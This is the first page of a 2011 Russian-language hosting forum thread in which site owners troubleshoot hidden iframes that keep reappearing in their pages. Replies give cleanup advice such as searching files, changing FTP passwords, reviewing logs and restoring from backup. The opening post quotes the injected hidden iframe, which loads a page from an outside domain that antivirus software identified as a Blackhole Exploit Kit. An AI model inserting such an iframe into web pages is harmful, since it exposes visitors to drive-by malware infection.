FreeHost.com.UA
Ноября 21, 2017, 06:20:21 pm *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Распродажа серверов http://freehost.com.ua/forum/index.php?topic=2093.0
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1] 2 3
  Печать  
Автор Тема: iframe на странице  (Прочитано 9865 раз)
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« : Апреля 19, 2011, 08:37:49 am »

периодически снизу страниц в исходном коде появляется
</html><div style="display:none"><iframe src="http://newlibrary.cz.cc/js/"></iframe></div>
<div style="display:none"><iframe src="http://newlibrary.cz.cc/js/"></iframe></div>
на странице сайте.

Искал в файлах и базе - ничего не нашел.
Раньше на странице http://stats.s12.freehost.com.ua/awstats/ находил такое же, но после вопроса в поддержку на статистике это прошло,а на моем сайте появляется.

Подскажите, как побороть.

антивирус ругается на WEB атак  Blackhole Exploit Kit
« Последнее редактирование: Апреля 19, 2011, 09:52:40 am от gransh » Записан
Thorin
Full Member
***

Karma: 2
Сообщений: 138


Просмотр профиля
« Ответ #1 : Апреля 19, 2011, 04:56:55 pm »

скачать бекап сайта, и тотал командером в файлах искать текст iframe или newlibrary.cz.cc если залили шелл то поиск слова Shell иногда помогает Улыбающийся
просмотреть все найденные файлы

проверить свой комп на вирусы
смненить пароль на фтп, к админка на сайте

какой движок? Погуглить свой движок на наличия дырок и пофиксить)
Записан
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #2 : Апреля 19, 2011, 07:30:05 pm »

Ещё бывает полезно запросить лог доступа/измененимя по ФТП, если примерно знаешь период когда "хакнули", и за этот период есть логи, то по ним можно отследить какие файлы правились/заливались.
Мне так код сапы втихоря прицепили, кулибины.  Смеющийся
Записан
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« Ответ #3 : Апреля 20, 2011, 08:37:04 am »

Спасибо,
базу и файлы я по этим словам посмотрел посмотрел - пока ничего не обнаружил
движек базовый phpbb 308 -  пишут "известных уязвимостей не обнаружено"
появляется эта фигня в cash каждую ночь.

На форуме поддержки движка посоветовали проверить хостинг на
Blackhole Exploit Kit, но я это сделать не могу же?


Записан
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #4 : Апреля 20, 2011, 01:28:50 pm »

Хм, ну теоретически если кто-то имеет рута, то он может "заразить" все виртхосты, вот только тогда шуму было бы не от вас одного, а от десятков пользователей. Самое вероятное что у вас, или у кого-то у кого был фтп доступ, его увели (вероятнее всего посредством заражения ПК каким нить троянцем). И потом уже хакер под вашими данными зашёл, залил какой-то файлик, или же заменил/дописал что-то в один из уже существующих, чтоб иметь доступ когда вы смените фтп пасс. Почистите кеш. Смените фтп пасс. Запорсите http логи за сутки (если они вам не доступны) и внимательно их изучите, какие файлы запускались. Может что-то необычное найдёте. Если посещаемость небольшая, то и лог будет небольшой.
Если ничего сами найти не сможете, попросите сапорт. Если и они спасуют, есть вариант заменить все файлы форума, как минимум всю админскую часть для начала.
Записан
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« Ответ #5 : Апреля 20, 2011, 02:45:40 pm »

AMBA. спасибо,
я это все уже проделывал от логов и до замены всех файлов, но пока утром появляется снова в кеше.   
Записан
Artu
Jr. Member
**

Karma: 0
Сообщений: 59


Просмотр профиля
« Ответ #6 : Апреля 20, 2011, 04:03:12 pm »

За последние два дня обнаружил 2 iFrame на двух разных аккаунтах FreeHost.

Что-то подозрительно..
Записан
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #7 : Апреля 20, 2011, 08:09:29 pm »

Давайте так. На каких серверах аккаунты? У меня есть сайты на многих серверах, попробую посмотреть у себя на сайтах на тех серверах где вы хоститесь. Уж если сервер заражен, то вирус должен поразить все сайты, а не выборочно, по логике.
Но на 90% что вирусня сидит у вас, и тырит фтп пароли. Попробуйте всё же внимательно проинспектировать свои машины, в помощь есть хороший ресурс http://virusinfo.info/ где помогают в лечении.
Ну и как минимум, не сохраняйте пароли от фтп, в фтп клиенте. Если уж совсем лень копипастить, то есть такая хитрость, при сохранении дописывайте к паролю несколько символов, а при коннекте стирайте.
Записан
Artu
Jr. Member
**

Karma: 0
Сообщений: 59


Просмотр профиля
« Ответ #8 : Апреля 20, 2011, 09:24:33 pm »

2 разных клиента и аккаунта. Один говорит что вообще не заходил по FTP.
Я не заходил, и не знал доступ.

В одном сайте сменили пароль, восстановили из архива - пока норм.
Во втором пока восстанавливаем.

Антивирь стоит. Собственно он и ругается.

Один HTTP cервер: 12, второй нужно уточнять.

« Последнее редактирование: Апреля 20, 2011, 09:26:38 pm от Artu » Записан
Artu
Jr. Member
**

Karma: 0
Сообщений: 59


Просмотр профиля
« Ответ #9 : Апреля 20, 2011, 09:36:53 pm »

Второй тоже 12.
Записан
Artu
Jr. Member
**

Karma: 0
Сообщений: 59


Просмотр профиля
« Ответ #10 : Апреля 20, 2011, 10:01:22 pm »

Цитировать
Раньше на странице http://stats.s12.freehost.com.ua/awstats/ находил такое же, но после вопроса в поддержку на статистике это прошло,а на моем сайте появляется.

Да уж.

Записан
Artu
Jr. Member
**

Karma: 0
Сообщений: 59


Просмотр профиля
« Ответ #11 : Апреля 20, 2011, 10:02:04 pm »

Восстановление из архива помогло.
Записан
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« Ответ #12 : Апреля 20, 2011, 10:54:52 pm »

Да тоже 12. Посмотрим утром  Шокированный
« Последнее редактирование: Апреля 20, 2011, 10:56:25 pm от gransh » Записан
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« Ответ #13 : Апреля 21, 2011, 12:13:27 pm »

Пока чисто  Смеющийся

Зато снова подключение к странице по 10 сек.
наверно антивирус на хостинге работает  Показывает язык
« Последнее редактирование: Апреля 21, 2011, 02:36:01 pm от gransh » Записан
gransh
Newbie
*

Karma: 0
Сообщений: 19


Просмотр профиля
« Ответ #14 : Апреля 21, 2011, 03:51:53 pm »

Опять iframe  Рот на замке
Записан
Страниц: [1] 2 3
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006-2011, Simple Machines Valid XHTML 1.0! Valid CSS!